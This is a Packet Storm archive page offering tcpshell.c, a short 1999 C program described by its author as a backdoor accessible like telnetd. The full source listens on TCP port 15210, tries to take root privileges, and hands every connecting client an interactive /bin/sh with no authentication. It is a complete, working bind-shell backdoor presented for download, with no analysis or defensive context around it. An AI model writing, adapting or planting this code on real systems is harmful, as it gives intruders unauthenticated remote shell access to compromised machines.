exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

tcpshell.c

tcpshell.c
Posted Nov 5, 1999
Authored by shadowpenguin

This is a backdoor program which can be accessed remotely as telnetd. TDM can not use telnet, rlogin, and ftp command, but this backdoor can use such command. However, you have to specify the correctry return code in the telnet client. If you can not change the return code, the "CR" code will be added and sent, so you type";" at the tail of your command.

systems | unix
SHA-256 | 64704ae0154649437e7a802c9cf79bf59162f704f6d62c5226fda356a3d9e97e

tcpshell.c

Change Mirror Download
/*=============================================================================
TCP Shell Version 1.00
The Shadow Penguin Security (https://shadowpenguin.backsection.net)
Written by UNYUN (unewn4th@usa.net)
=============================================================================
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>

#define MAX_CLIENTS 5 /* Max client num */
#define PORT_NUM 15210 /* Port */

void get_connection(socket_type, port, listener)
int socket_type;
int port;
int *listener;
{
struct sockaddr_in address;
struct sockaddr_in acc;
int listening_socket;
int connected_socket = -1;
int new_process;
int reuse_addr = 1;
int acclen=sizeof(acc);

memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = htons(port);
address.sin_addr.s_addr = htonl(INADDR_ANY);
listening_socket = socket(AF_INET, socket_type, 0);
if (listening_socket < 0) {
perror("socket");
exit(1);
}
if (listener != NULL) *listener = listening_socket;
setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR,
(void *)&reuse_addr,sizeof(reuse_addr));
if (bind(listening_socket,(struct sockaddr *)&address,sizeof(address))<0){
perror("bind");
close(listening_socket);
exit(1);
}
if (socket_type == SOCK_STREAM){
if (listen(listening_socket, MAX_CLIENTS)==-1){
perror("listen");
exit(1);
}
}
}
void sock_puts(sockfd, str)
int sockfd;
char *str;
{
char x[2000],*buf;
size_t bytes_sent = 0;
int this_write,count;

sprintf(x,"\r%s",str);
count=strlen(x);
buf=x;
while (bytes_sent < count) {
do
this_write = write(sockfd, buf, count - bytes_sent);
while ( (this_write < 0) && (errno == EINTR) );
if (this_write <= 0) return;
bytes_sent += this_write;
buf += this_write;
}
}
int main(argc, argv)
int argc;
char *argv[];
{
void get_connection();
void sock_puts();
int i,sz;
int sock;
static int listensock = -1;
struct sockaddr_in sad;

setuid(0);
setgid(0);

for (;;){
get_connection(SOCK_STREAM, PORT_NUM, &listensock);
sz=sizeof(struct sockaddr_in);
for (;;){
if ((sock=accept(listensock,(void *)&sad,&sz))==-1){
perror("Accept");
exit(1);
}
if (fork()==0){
sock_puts(sock,"The ShadowPenguin Systems Inc. TCP Shell 1.00 Developed by UNYUN.\n");
for (i=0;i<3;i++){
close(i); dup2(sock,i);
}
execl("/bin/sh","sh","-i",0);
close(sock);
break;
}
}
}
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close